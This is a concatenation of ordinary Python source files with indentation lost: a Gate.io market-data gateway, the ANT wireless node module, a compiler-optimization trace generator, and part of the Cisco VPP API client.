for i in range(0, max_ask_len):
l2_depth.asks[i].price = float(asks[i][0]) if type(asks[i][0]) != float else asks[i][0]
l2_depth.asks[i].volume = float(asks[i][1]) if type(asks[i][1]) != float else asks[i][1]
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return l2_depth
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
# print(raw)
keys = list(raw.keys())
if cls.get_trades_timestamp_field_name() in keys and \
cls.get_trade_id_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
date_time = float(raw[cls.get_trades_timestamp_field_name()])
date_time = date_time / cls.get_timestamp_offset()
trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = Trade.parse_side(str(raw[cls.get_trade_side_field_name()]))
# Trade id
trade.trade_id = str(raw[cls.get_trade_id_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
# If verify cert, got <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:749)>
res = cls.request(cls.get_order_book_link(instmt), verify_cert=False)
if res:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt):
"""
Get trades
:param instmt: Instrument
:param trade_id: Trade id
:return: List of trades
"""
link = cls.get_trades_link(instmt)
# print(link)
# If verify cert, got <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:749)>
res = cls.request(link, verify_cert=False)
trades = []
if len(res['data']) > 0:
for t in res['data']:
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
class ExchGwGateio(ExchangeGateway):
"""
Exchange gateway
"""
def __init__(self, db_clients):
"""
Constructor
:param db_client: Database client
"""
ExchangeGateway.__init__(self, ExchGwApiGateio(), db_clients)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Gateio'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt)
# if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
if l2_depth:
# print(l2_depth)
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(5)
time.sleep(3)
def get_trades_worker(self, instmt):
"""
Get order book worker thread
:param instmt: Instrument name
"""
while True:
try:
ret = self.api_socket.get_trades(instmt)
if ret is None or len(ret) == 0:
time.sleep(5)
continue
except Exception as e:
Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
time.sleep(5)
continue
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
# print(trade)
instmt.set_exch_trade_id(trade.trade_id)
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(3)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = threading.Thread(target=partial(self.get_order_book_worker, instmt))
# t2 = threading.Thread(target=partial(self.get_trades_worker, instmt))
t1.start()
# t2.start()
return [t1]
# return [t1, t2]
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'Gateio'
instmt_name = 'AEUSDT'
instmt_code = 'AE_USDT'
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_client = SqlClientTemplate()
exch = ExchGwGateio([db_client])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_recovered(False)
exch.get_order_book_worker(instmt)
exch.get_trades_worker(instmt) |
node.py | # Ant
#
# Copyright (c) 2012, Gustav Tiger <gustav@tiger.name>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from __future__ import absolute_import, print_function
import collections
import threading
import logging
try:
# Python 3
import queue
except ImportError:
# Python 2
import Queue as queue
from ant.base.ant import Ant
from ant.base.message import Message
from ant.easy.channel import Channel
from ant.easy.filter import wait_for_event, wait_for_response, wait_for_special
_logger = logging.getLogger("ant.easy.node")
class Node():
def __init__(self):
self._responses_cond = threading.Condition()
self._responses = collections.deque()
self._event_cond = threading.Condition()
self._events = collections.deque()
self._datas = queue.Queue()
self.channels = {}
self.ant = Ant()
self._running = True
self._worker_thread = threading.Thread(target=self._worker, name="ant.easy")
self._worker_thread.start()
def new_channel(self, ctype):
size = len(self.channels)
channel = Channel(size, self, self.ant)
self.channels[size] = channel
channel._assign(ctype, 0x00)
return channel
def request_message(self, messageId):
_logger.debug("requesting message %#02x", messageId)
self.ant.request_message(0, messageId)
_logger.debug("done requesting message %#02x", messageId)
return self.wait_for_special(messageId)
def set_network_key(self, network, key):
self.ant.set_network_key(network, key)
return self.wait_for_response(Message.ID.SET_NETWORK_KEY)
def wait_for_event(self, ok_codes):
return wait_for_event(ok_codes, self._events, self._event_cond)
def wait_for_response(self, event_id):
return wait_for_response(event_id, self._responses, self._responses_cond)
def wait_for_special(self, event_id):
return wait_for_special(event_id, self._responses, self._responses_cond)
def _worker_response(self, channel, event, data):
self._responses_cond.acquire()
self._responses.append((channel, event, data))
self._responses_cond.notify()
self._responses_cond.release()
def _worker_event(self, channel, event, data):
if event == Message.Code.EVENT_RX_BURST_PACKET:
self._datas.put(('burst', channel, data))
elif event == Message.Code.EVENT_RX_BROADCAST:
self._datas.put(('broadcast', channel, data))
else:
self._event_cond.acquire()
self._events.append((channel, event, data))
self._event_cond.notify()
self._event_cond.release()
def _worker(self):
self.ant.response_function = self._worker_response
self.ant.channel_event_function = self._worker_event
# TODO: check capabilities
self.ant.start()
def _main(self):
while self._running:
try:
(data_type, channel, data) = self._datas.get(True, 1.0)
self._datas.task_done()
if data_type == 'broadcast':
self.channels[channel].on_broadcast_data(data)
elif data_type == 'burst':
self.channels[channel].on_burst_data(data)
else:
_logger.warning("Unknown data type '%s': %r", data_type, data)
except queue.Empty as e:
pass
def start(self):
self._main()
def stop(self):
if self._running:
_logger.debug("Stoping ant.easy")
self._running = False
self.ant.stop()
self._worker_thread.join()
|
generate_default_trace.py | # coding=utf-8
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generate initial training data from the behavior of the current heuristic."""
import functools
import os
import queue
import random
from absl import app
from absl import flags
from absl import logging
import tensorflow as tf
from tf_agents.system import system_multiprocessing as multiprocessing
from compiler_opt.rl import inlining_runner
flags.DEFINE_string('data_path', None, 'Path to folder containing IR files.')
flags.DEFINE_string('output_path', None, 'Path to the output tfrecord file.')
flags.DEFINE_enum(
'compile_task', 'inlining', ['inlining'],
'compile task to generate tfrecord with, only support '
'inlining currently.')
flags.DEFINE_string('clang_path', 'clang', 'Path to clang binary.')
flags.DEFINE_string('llvm_size_path', 'llvm-size', 'Path to llvm_size binary.')
flags.DEFINE_string('launcher_path', None, 'Path to launcher binary.')
flags.DEFINE_integer(
'num_workers', None,
'Number of parallel workers for compilation. `None` for maximum available.')
flags.DEFINE_float(
'sampling_rate', 1,
'Sampling rate of modules, 0.5 means 50% sampling rate that generates data '
'for half modules.')
FLAGS = flags.FLAGS
def worker(runner, work_queue: queue.Queue, results_queue: queue.Queue):
"""What each worker process does.
Each worker picks a workitem from the work_queue, process it, and deposits
a result on the results_queue, in either success or failure cases.
The results_queue items are tuples (workitem, result). On failure, the result
is None.
Args:
runner: the data collector.
work_queue: the queue of unprocessed work items.
results_queue: the queue where results are deposited.
"""
while True:
try:
module_triple = work_queue.get_nowait()
except queue.Empty:
return
try:
record = runner.collect_data(module_triple, '', None)
results_queue.put((module_triple, record))
except: # pylint: disable=bare-except
logging.error('Failed to compile %s.', module_triple)
results_queue.put((module_triple, None))
def main(_):
# Initialize runner and file_suffix according to compile_task.
if FLAGS.compile_task == 'inlining':
runner = inlining_runner.InliningRunner(
clang_path=FLAGS.clang_path, llvm_size_path=FLAGS.llvm_size_path,
launcher_path=FLAGS.launcher_path)
file_suffix = ['.bc', '.cmd']
with open(os.path.join(FLAGS.data_path, 'module_paths'), 'r') as f:
module_paths = [
os.path.join(FLAGS.data_path, name.rstrip('\n')) for name in f
]
# Sampling if needed.
if FLAGS.sampling_rate < 1:
sampled_modules = int(len(module_paths) * FLAGS.sampling_rate)
module_paths = random.sample(module_paths, k=sampled_modules)
# sort files by size, to process the large files upfront, hopefully while
# other smaller files are processed in parallel
sizes_and_paths = [(os.path.getsize(p + '.bc'), p) for p in module_paths]
sizes_and_paths.sort(reverse=True)
sorted_module_paths = [p for _, p in sizes_and_paths]
file_paths = [
tuple([p + suffix for suffix in file_suffix]) for p in sorted_module_paths
]
worker_count = (
min(os.cpu_count(), FLAGS.num_workers)
if FLAGS.num_workers else os.cpu_count())
with tf.io.TFRecordWriter(FLAGS.output_path) as file_writer:
ctx = multiprocessing.get_context()
m = ctx.Manager()
results_queue = m.Queue()
work_queue = m.Queue()
for path in file_paths:
work_queue.put(path)
processes = [
ctx.Process(
target=functools.partial(worker, runner, work_queue, results_queue))
for _ in range(0, worker_count)
]
for p in processes:
p.start()
total_successful_examples = 0
total_work = len(file_paths)
total_failed_examples = 0
for _ in range(0, total_work):
_, record = results_queue.get()
if record:
total_successful_examples += 1
file_writer.write(record[0])
else:
total_failed_examples += 1
logging.log_every_n_seconds(logging.INFO,
'%d success, %d failed out of %d', 10,
total_successful_examples,
total_failed_examples, total_work)
print('%d of %d modules succeeded.' %
(total_successful_examples, len(file_paths)))
for p in processes:
p.join()
if __name__ == '__main__':
flags.mark_flag_as_required('data_path')
flags.mark_flag_as_required('output_path')
multiprocessing.handle_main(functools.partial(app.run, main))
|
vpp_papi.py | #!/usr/bin/env python3
#
# Copyright (c) 2016 Cisco and/or its affiliates.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from __future__ import absolute_import
import ctypes
import ipaddress
import sys
import multiprocessing as mp
import os
import queue
import logging
import functools
import json
import threading
import fnmatch
import weakref
import atexit
import time
from . vpp_format import verify_enum_hint
from . vpp_serializer import VPPType, VPPEnumType, VPPEnumFlagType, VPPUnionType
from . vpp_serializer import VPPMessage, vpp_get_type, VPPTypeAlias
try:
import VppTransport
except ModuleNotFoundError:
class V:
"""placeholder for VppTransport as the implementation is dependent on
VPPAPIClient's initialization values
"""
VppTransport = V
logger = logging.getLogger('vpp_papi')
logger.addHandler(logging.NullHandler())
__all__ = ('FuncWrapper', 'VppApiDynamicMethodHolder',
'VppEnum', 'VppEnumType', 'VppEnumFlag',
'VPPIOError', 'VPPRuntimeError', 'VPPValueError',
'VPPApiClient', )
def metaclass(metaclass):
@functools.wraps(metaclass)
def wrapper(cls):
return metaclass(cls.__name__, cls.__bases__, cls.__dict__.copy())
return wrapper
class VppEnumType(type):
def __getattr__(cls, name):
t = vpp_get_type(name)
return t.enum
@metaclass(VppEnumType)
class VppEnum:
pass
@metaclass(VppEnumType)
class VppEnumFlag:
pass
def vpp_atexit(vpp_weakref):
"""Clean up VPP connection on shutdown."""
vpp_instance = vpp_weakref()
if vpp_instance and vpp_instance.transport.connected:
logger.debug('Cleaning up VPP on exit')
vpp_instance.disconnect()
def add_convenience_methods():
# provide convenience methods to IP[46]Address.vapi_af
def _vapi_af(self):
if 6 == self._version:
return VppEnum.vl_api_address_family_t.ADDRESS_IP6.value
if 4 == self._version:
return VppEnum.vl_api_address_family_t.ADDRESS_IP4.value
raise ValueError("Invalid _version.")
def _vapi_af_name(self):
if 6 == self._version:
return 'ip6'
if 4 == self._version:
return 'ip4'
raise ValueError("Invalid _version.")
ipaddress._IPAddressBase.vapi_af = property(_vapi_af)
ipaddress._IPAddressBase.vapi_af_name = property(_vapi_af_name)
class VppApiDynamicMethodHolder:
pass
class FuncWrapper:
def __init__(self, func):
self._func = func
self.__name__ = func.__name__
self.__doc__ = func.__doc__
def __call__(self, **kwargs):
return self._func(**kwargs)
def __repr__(self):
return '<FuncWrapper(func=<%s(%s)>)>' % (self.__name__, self.__doc__)
class VPPApiError(Exception):
pass
class VPPNotImplementedError(NotImplementedError):
pass
class VPPIOError(IOError):
pass
class VPPRuntimeError(RuntimeError):
pass
class VPPValueError(ValueError):
pass
class VPPApiJSONFiles:
@classmethod
def find_api_dir(cls, dirs):
"""Attempt to find the best directory in which API definition
files may reside. If the value VPP_API_DIR exists in the environment
then it is first on the search list. If we're inside a recognized
location in a VPP source tree (src/scripts and src/vpp-api/python)
then entries from there to the likely locations in build-root are
added. Finally the location used by system packages is added.
:returns: A single directory name, or None if no such directory
could be found.
"""
# perhaps we're in the 'src/scripts' or 'src/vpp-api/python' dir;
# in which case, plot a course to likely places in the src tree
import __main__ as main
if hasattr(main, '__file__'):
# get the path of the calling script
localdir = os.path.dirname(os.path.realpath(main.__file__))
else:
# use cwd if there is no calling script
localdir = os.getcwd()
localdir_s = localdir.split(os.path.sep)
def dmatch(dir):
"""Match dir against right-hand components of the script dir"""
d = dir.split('/') # param 'dir' assumes a / separator
length = len(d)
return len(localdir_s) > length and localdir_s[-length:] == d
def sdir(srcdir, variant):
"""Build a path from srcdir to the staged API files of
'variant' (typically '' or '_debug')"""
# Since 'core' and 'plugin' files are staged
# in separate directories, we target the parent dir.
return os.path.sep.join((
srcdir,
'build-root',
'install-vpp%s-native' % variant,
'vpp',
'share',
'vpp',
'api',
))
srcdir = None
if dmatch('src/scripts'):
srcdir = os.path.sep.join(localdir_s[:-2])
elif dmatch('src/vpp-api/python'):
srcdir = os.path.sep.join(localdir_s[:-3])
elif dmatch('test'):
# we're apparently running tests
srcdir = os.path.sep.join(localdir_s[:-1])
if srcdir:
# we're in the source tree, try both the debug and release
# variants.
dirs.append(sdir(srcdir, '_debug'))
dirs.append(sdir(srcdir, ''))
# Test for staged copies of the scripts
# For these, since we explicitly know if we're running a debug versus
# release variant, target only the relevant directory
if dmatch('build-root/install-vpp_debug-native/vpp/bin'):
srcdir = os.path.sep.join(localdir_s[:-4])
dirs.append(sdir(srcdir, '_debug'))
if dmatch('build-root/install-vpp-native/vpp/bin'):
srcdir = os.path.sep.join(localdir_s[:-4])
dirs.append(sdir(srcdir, ''))
# finally, try the location system packages typically install into
dirs.append(os.path.sep.join(('', 'usr', 'share', 'vpp', 'api')))
# check the directories for existence; first one wins
for dir in dirs:
if os.path.isdir(dir):
return dir
return None
@classmethod
def find_api_files(cls, api_dir=None, patterns='*'): # -> list
"""Find API definition files from the given directory tree with the
given pattern. If no directory is given then find_api_dir() is used
to locate one. If no pattern is given then all definition files found
in the directory tree are used.
:param api_dir: A directory tree in which to locate API definition
files; subdirectories are descended into.
If this is None then find_api_dir() is called to discover it.
:param patterns: A list of patterns to use in each visited directory
when looking for files.
This can be a list/tuple object or a comma-separated string of
patterns. Each value in the list will have leading/trialing
whitespace stripped.
The pattern specifies the first part of the filename, '.api.json'
is appended.
The results are de-duplicated, thus overlapping patterns are fine.
If this is None it defaults to '*' meaning "all API files".
:returns: A list of file paths for the API files found.
"""
if api_dir is None:
api_dir = cls.find_api_dir([])
if api_dir is None:
raise VPPApiError("api_dir cannot be located")
if isinstance(patterns, list) or isinstance(patterns, tuple):
patterns = [p.strip() + '.api.json' for p in patterns]
else:
patterns = [p.strip() + '.api.json' for p in patterns.split(",")]
api_files = []
for root, dirnames, files in os.walk(api_dir):
# iterate all given patterns and de-dup the result
files = set(sum([fnmatch.filter(files, p) for p in patterns], []))
for filename in files:
api_files.append(os.path.join(root, filename))
return api_files
@classmethod
def process_json_file(self, apidef_file):
api = json.load(apidef_file)
return self._process_json(api)
@classmethod
def process_json_str(self, json_str):
api = json.loads(json_str)
return self._process_json(api)
@staticmethod
def _process_json(api): # -> Tuple[Dict, Dict]
types = {}
services = {}
messages = {}
try:
for t in api['enums']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'enum', 'data': t}
except KeyError:
pass
try:
for t in api['enumflags']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'enum', 'data': t}
except KeyError:
pass
try:
for t in api['unions']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'union', 'data': t}
except KeyError:
pass
try:
for t in api['types']:
t[0] = 'vl_api_' + t[0] + '_t'
types[t[0]] = {'type': 'type', 'data': t}
except KeyError:
pass
try:
for t, v in api['aliases'].items():
types['vl_api_' + t + '_t'] = {'type': 'alias', 'data': v}
except KeyError:
pass
try:
services.update(api['services'])
except KeyError:
pass
i = 0
while True:
unresolved = {}
for k, v in types.items():
t = v['data']
if not vpp_get_type(k):
if v['type'] == 'enum':
try:
VPPEnumType(t[0], t[1:])
except ValueError:
unresolved[k] = v
if not vpp_get_type(k):
if v['type'] == 'enumflag':
try:
VPPEnumFlagType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'union':
try:
VPPUnionType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'type':
try:
VPPType(t[0], t[1:])
except ValueError:
unresolved[k] = v
elif v['type'] == 'alias':
try:
VPPTypeAlias(k, t)
except ValueError:
unresolved[k] = v
if len(unresolved) == 0:
break
if i > 3:
raise VPPValueError('Unresolved type definitions {}'
.format(unresolved))
types = unresolved
i += 1
try:
for m in api['messages']:
try:
messages[m[0]] = VPPMessage(m[0], m[1:])
except VPPNotImplementedError:
### OLE FIXME
logger.error('Not implemented error for {}'.format(m[0]))
except KeyError:
pass
return messages, services
class VPPApiClient:
"""VPP interface.
This class provides the APIs to VPP. The APIs are loaded
from provided .api.json files and makes functions accordingly.
These functions are documented in the VPP .api files, as they
are dynamically created.
Additionally, VPP can send callback messages; this class
provides a means to register a callback function to receive
these messages in a background thread.
"""
apidir = None
VPPApiError = VPPApiError
VPPRuntimeError = VPPRuntimeError
VPPValueError = VPPValueError
VPPNotImplementedError = VPPNotImplementedError
VPPIOError = VPPIOError
def __init__(self, *, apifiles=None, testmode=False, async_thread=True,
logger=None, loglevel=None,
read_timeout=5, use_socket=True,
server_address='/run/vpp/api.sock'):
"""Create a VPP API object.
apifiles is a list of files containing API
descriptions that will be loaded - methods will be
dynamically created reflecting these APIs. If not
provided this will load the API files from VPP's
default install location.
logger, if supplied, is the logging logger object to log to.
loglevel, if supplied, is the log level this logger is set
to report at (from the loglevels in the logging module).
"""
if logger is None:
logger = logging.getLogger(
"{}.{}".format(__name__, self.__class__.__name__))
if loglevel is not None:
logger.setLevel(loglevel)
self.logger = logger
self.messages = {}
self.services = {}
self.id_names = []
self.id_msgdef = []
self.header = VPPType('header', [['u16', 'msgid'],
['u32', 'client_index']])
self.apifiles = []
self.event_callback = None
self.message_queue = queue.Queue()
self.read_timeout = read_timeout
self.async_thread = async_thread
self.event_thread = None
self.testmode = testmode
self.use_socket = use_socket
self.server_address = server_address
self._apifiles = apifiles
self.stats = {}
if use_socket:
from . vpp_transport_socket import VppTransport
else:
from . vpp_transport_shmem import VppTransport
if not apifiles:
# Pick up API definitions from default directory
try:
apifiles = VPPApiJSONFiles.find_api_files(self.apidir)
except (RuntimeError, VPPApiError):
# In test mode we don't care that we can't find the API files
if testmode:
apifiles = []
else:
raise VPPRuntimeError
for file in apifiles:
with open(file) as apidef_file:
m, s = VPPApiJSONFiles.process_json_file(apidef_file)
self.messages.update(m)
self.services.update(s)
self.apifiles = apifiles
# Basic sanity check
if len(self.messages) == 0 and not testmode:
raise VPPValueError(1, 'Missing JSON message definitions')
if not(verify_enum_hint(VppEnum.vl_api_address_family_t)):
raise VPPRuntimeError("Invalid address family hints. "
"Cannot continue.")
self.transport = VppTransport(self, read_timeout=read_timeout,
server_address=server_address)
# Make sure we allow VPP to clean up the message rings.
atexit.register(vpp_atexit, weakref.ref(self))
add_convenience_methods()
def get_function(self, name):
return getattr(self._api, name)
class ContextId:
"""Multiprocessing-safe provider of unique context IDs."""
def __init__(self):
self.context = mp.Value(ctypes.c_uint, 0)
self.lock = mp.Lock()
def __call__(self):
"""Get a new unique (or, at least, not recently used) context."""
with self.lock:
self.context.value += 1
return self.context.value
get_context = ContextId()
def get_type(self, name):
return vpp_get_type(name)
@property
def api(self):
if not hasattr(self, "_api"):
raise VPPApiError("Not connected, api definitions not available")
return self._api
def make_function(self, msg, i, multipart, do_async):
if (do_async):
def f(**kwargs):
return self._call_vpp_async(i, msg, **kwargs)
else:
def f(**kwargs):
return self._call_vpp(i, msg, multipart, **kwargs)
f.__name__ = str(msg.name)
f.__doc__ = ", ".join(["%s %s" %
(msg.fieldtypes[j], k)
for j, k in enumerate(msg.fields)])
f.msg = msg
return f
def _register_functions(self, do_async=False):
self.id_names = [None] * (self.vpp_dictionary_maxid + 1)
self.id_msgdef = [None] * (self.vpp_dictionary_maxid + 1)
self._api = VppApiDynamicMethodHolder()
for name, msg in self.messages.items():
n = name + '_' + msg.crc[2:]
i = self.transport.get_msg_index(n)
if i > 0:
self.id_msgdef[i] = msg
self.id_names[i] = name
# Create function for client side messages.
if name in self.services:
f = self.make_function(msg, i, self.services[name], do_async)
setattr(self._api, name, FuncWrapper(f))
else:
self.logger.debug(
'No such message type or failed CRC checksum: %s', n)
def connect_internal(self, name, msg_handler, chroot_prefix, rx_qlen,
do_async):
pfx = chroot_prefix.encode('utf-8') if chroot_prefix else None
rv = self.transport.connect(name, pfx,
msg_handler, rx_qlen)
if rv != 0:
raise VPPIOError(2, 'Connect failed')
self.vpp_dictionary_maxid = self.transport.msg_table_max_index()
self._register_functions(do_async=do_async)
# Initialise control ping
crc = self.messages['control_ping'].crc
self.control_ping_index = self.transport.get_msg_index(
('control_ping' + '_' + crc[2:]))
self.control_ping_msgdef = self.messages['control_ping']
if self.async_thread:
self.event_thread = threading.Thread(
target=self.thread_msg_handler)
self.event_thread.daemon = True
self.event_thread.start()
else:
self.event_thread = None
return rv
def connect(self, name, chroot_prefix=None, do_async=False, rx_qlen=32):
"""Attach to VPP.
name - the name of the client.
chroot_prefix - if VPP is chroot'ed, the prefix of the jail
do_async - if true, messages are sent without waiting for a reply
rx_qlen - the length of the VPP message receive queue between
client and server.
"""
msg_handler = self.transport.get_callback(do_async)
return self.connect_internal(name, msg_handler, chroot_prefix, rx_qlen,
do_async)
def connect_sync(self, name, chroot_prefix=None, rx_qlen=32):
"""Attach to VPP in synchronous mode. Application must poll for events.
name - the name of the client.
chroot_prefix - if VPP is chroot'ed, the prefix of the jail
rx_qlen - the length of the VPP message receive queue between
client and server.
"""
return self.connect_internal(name, None, chroot_prefix, rx_qlen,
do_async=False)
def disconnect(self):
"""Detach from VPP."""
rv = self.transport.disconnect()
if self.event_thread is not None:
self.message_queue.put("terminate event thread")
return rv
def msg_handler_sync(self, msg):
"""Process an incoming message from VPP in sync mode.
The message may be a reply or it may be an async notification.
"""
r = self.decode_incoming_msg(msg)
if r is None:
return
# If we have a context, then use the context to find any
# request waiting for a reply
context = 0
if hasattr(r, 'context') and r.context > 0:
context = r.context
if context == 0:
# No context -> async notification that we feed to the callback
self.message_queue.put_nowait(r)
else:
raise VPPIOError(2, 'RPC reply message received in event handler')
def has_context(self, msg):
if len(msg) < 10:
return False
header = VPPType('header_with_context', [['u16', 'msgid'],
['u32', 'client_index'],
['u32', 'context']])
(i, ci, context), size = header.unpack(msg, 0)
if self.id_names[i] == 'rx_thread_exit':
return
#
# Decode message and returns a tuple.
#
msgobj = self.id_msgdef[i]
if 'context' in msgobj.field_by_name and context >= 0:
return True
return False
def decode_incoming_msg(self, msg, no_type_conversion=False):
if not msg:
logger.warning('vpp_api.read failed')
return
(i, ci), size = self.header.unpack(msg, 0)
if self.id_names[i] == 'rx_thread_exit':
return
#
# Decode message and returns a tuple.
#
msgobj = self.id_msgdef[i]
if not msgobj:
raise VPPIOError(2, 'Reply message undefined')
r, size = msgobj.unpack(msg, ntc=no_type_conversion)
return r
def msg_handler_async(self, msg):
"""Process a message from VPP in async mode.
In async mode, all messages are returned to the callback.
"""
r = self.decode_incoming_msg(msg)
if r is None:
return
msgname = type(r).__name__
if self.event_callback:
self.event_callback(msgname, r)
def _control_ping(self, context):
"""Send a ping command."""
self._call_vpp_async(self.control_ping_index,
self.control_ping_msgdef,
context=context)
def validate_args(self, msg, kwargs):
d = set(kwargs.keys()) - set(msg.field_by_name.keys())
if d:
raise VPPValueError('Invalid argument {} to {}'
.format(list(d), msg.name))
def _add_stat(self, name, ms):
if not name in self.stats:
self.stats[name] = {'max': ms, 'count': 1, 'avg': ms}
else:
if ms > self.stats[name]['max']:
self.stats[name]['max'] = ms
self.stats[name]['count'] += 1
n = self.stats[name]['count']
self.stats[name]['avg'] = self.stats[name]['avg'] * (n - 1) / n + ms / n
def get_stats(self):
s = '\n=== API PAPI STATISTICS ===\n'
s += '{:<30} {:>4} {:>6} {:>6}\n'.format('message', 'cnt', 'avg', 'max')
for n in sorted(self.stats.items(), key=lambda v: v[1]['avg'], reverse=True):
s += '{:<30} {:>4} {:>6.2f} {:>6.2f}\n'.format(n[0], n[1]['count'],
n[1]['avg'], n[1]['max'])
return s
def get_field_options(self, msg, fld_name):
# when there is an option, the msgdef has 3 elements.
# ['u32', 'ring_size', {'default': 1024}]
for _def in self.messages[msg].msgdef:
if isinstance(_def, list) and \
len(_def) == 3 and \
_def[1] == fld_name:
return _def[2]
def _call_vpp(self, i, msgdef, service, **kwargs):
"""Given a message, send the message and await a reply.
msgdef - the message packing definition
i - the message type index
multipart - True if the message returns multiple
messages in return.
context - context number - chosen at random if not
supplied.
The remainder of the kwargs are the arguments to the API call.
The return value is the message or message array containing
the response. It will raise an IOError exception if there was
no response within the timeout window.
"""
ts = time.time()
if 'context' not in kwargs:
context = self.get_context()
kwargs['context'] = context
else:
context = kwargs['context']
kwargs['_vl_msg_id'] = i
no_type_conversion = kwargs.pop('_no_type_conversion', False)
timeout = kwargs.pop('_timeout', None)
try:
if self.transport.socket_index:
kwargs['client_index'] = self.transport.socket_index
except AttributeError:
pass
self.validate_args(msgdef, kwargs)
s = 'Calling {}({})'.format(msgdef.name,
','.join(['{!r}:{!r}'.format(k, v) for k, v in kwargs.items()]))
self.logger.debug(s)
b = msgdef.pack(kwargs)
self.transport.suspend()
self.transport.write(b)
msgreply = service['reply']
stream = True if 'stream' in service else False
if stream:
if 'stream_msg' in service:
# New service['reply'] = _reply and service['stream_message'] = _details
stream_message = service['stream_msg']
modern =True
else:
# Old service['reply'] = _details
stream_message = msgreply
msgreply = 'control_ping_reply'
modern = False
# Send a ping after the request - we use its response
# to detect that we have seen all results.
self._control_ping(context)
# Block until we get a reply.
rl = []
while (True):
r = self.read_blocking(no_type_conversion, timeout)
if r is None:
raise VPPIOError(2, 'VPP API client: read failed')
msgname = type(r).__name__
if context not in r or r.context == 0 or context != r.context:
# Message being queued
self.message_queue.put_nowait(r)
continue
if msgname != msgreply and (stream and (msgname != stream_message)):
print('REPLY MISMATCH', msgreply, msgname, stream_message, stream)
if not stream:
rl = r
break
if msgname == msgreply:
if modern: # Return both reply and list
rl = r, rl
break
rl.append(r)
self.transport.resume()
